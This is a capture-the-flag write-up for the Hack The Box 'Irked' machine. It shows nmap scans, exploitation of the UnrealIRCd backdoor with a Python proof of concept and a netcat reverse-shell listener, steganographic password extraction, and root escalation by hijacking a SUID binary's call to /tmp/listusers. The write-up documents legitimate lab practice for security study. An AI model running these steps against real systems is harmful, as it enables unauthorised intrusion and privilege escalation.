Irked
Machine Level: Easy OS: Linux
Scanning
I ran an aggressive NMAP scan to find the services and ports that were open.
ajread@aj-ubuntu:~$ nmap -A [REMOTE IP] -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2023-02-11 19:41 EST
Nmap scan report for [REMOTE IP]
Host is up (0.015s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 46610/udp status
| 100024 1 52443/tcp status
| 100024 1 53455/tcp6 status
|_ 100024 1 57796/udp6 status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.66 secondsI also ran a full nmap scan to see if I missed any open ports.
ajread@aj-ubuntu:~$ nmap -p- [REMOTE IP] -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2023-02-11 19:42 EST
Nmap scan report for [REMOTE IP]
Host is up (0.024s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
6697/tcp open ircs-u
8067/tcp open infi-async
52443/tcp open unknown
65534/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 49.36 secondsEnumeration
I noticed that port 6697 was running ircs-u. I wanted to confirm which version of IRC was running since I knew there was an exploit that I could throw.
ajread@aj-ubuntu:~$ nmap -p6697 -sV -sC [REMOTE IP] -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2023-02-11 19:52 EST
Nmap scan report for [REMOTE IP]
Host is up (0.013s latency).
PORT STATE SERVICE VERSION
6697/tcp open irc UnrealIRCd
Service Info: Host: irked.htb
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.82 secondsI didnt get much information but I was able to run the unrealirc backdoor nmap script.
ajread@aj-ubuntu:~$ nmap -sV -p6697 --script=irc-unrealircd-backdoor [REMOTE IP] -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2023-02-11 19:56 EST
Nmap scan report for [REMOTE IP]
Host is up (0.013s latency).
PORT STATE SERVICE VERSION
6697/tcp open irc UnrealIRCd
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
Service Info: Host: irked.htb
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.43 secondsInitial Access
There was a metasploit module with unreal_ircd_3281_backdoor that can run commands. However, I wanted to use this POC written in Python to understand the backdoor better. I sent the exploit with the correct commands.
ajread@aj-ubuntu:~/hackthebox/playground$ python3 exploit.py [REMOTE IP] 6697 -payload python
Exploit sent successfully!I started a netcat listener and was dropped into a shell.
ajread@aj-ubuntu:~$ nc -lnvp 9999
Listening on 0.0.0.0 9999
Connection received on [REMOTE IP] 33553
ircd@irked:~/Unreal3.2$ whoami
whoami
ircdI wasnt able to read the user.txt file with my permissions.
ircd@irked:/home/djmardov$ cat user.txt
cat user.txt
cat: user.txt: Permission deniedHowever, there was a .backup file with an interesting steg file comment about a pw or password.
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
[REDACTED]I navigated to the website on port 80 and noticed that there is a jpeg that could be related to the stego. I downloaded the jpeg and extracted the contents using the pw.
ajread@aj-ubuntu:~/hackthebox/playground$ steghide extract -sf irked.jpg
Enter passphrase:
wrote extracted data to "pass.txt".I was able to ssh into the machine using the extracted pass.txt from the jpeg. And I was able to find the user flag.
djmardov@irked:~$ wc -c user.txt
33 user.txtPrivilege Escalation
I looked for binaries that could be used for privilege escalation.
djmardov@irked:~$ find /usr -perm -4000
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuserIt looked like /usr/bin/viewuser is owned by root and can be run as root. I ran the command and it appeared to call a tmp file named listusers.
djmardov@irked:~$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2023-02-11 19:40 (:0)
djmardov pts/1 2023-02-11 20:13 ([LOCAL IP])
sh: 1: /tmp/listusers: not foundI created a fake list with only a shell.
djmardov@irked:~$ cat /tmp/listusers
/bin/shI then made the file an executable to run.
djmardov@irked:~$ chmod +x /tmp/listusers And then I ran viewuser and I was dropped into a privileged shell.
djmardov@irked:~$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2023-02-11 19:40 (:0)
djmardov pts/1 2023-02-11 20:13 ([LOCAL IP])
# whoami
root
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)I was able to read the root flag!
# wc -c /root/root.txt
33 /root/root.txtLast updated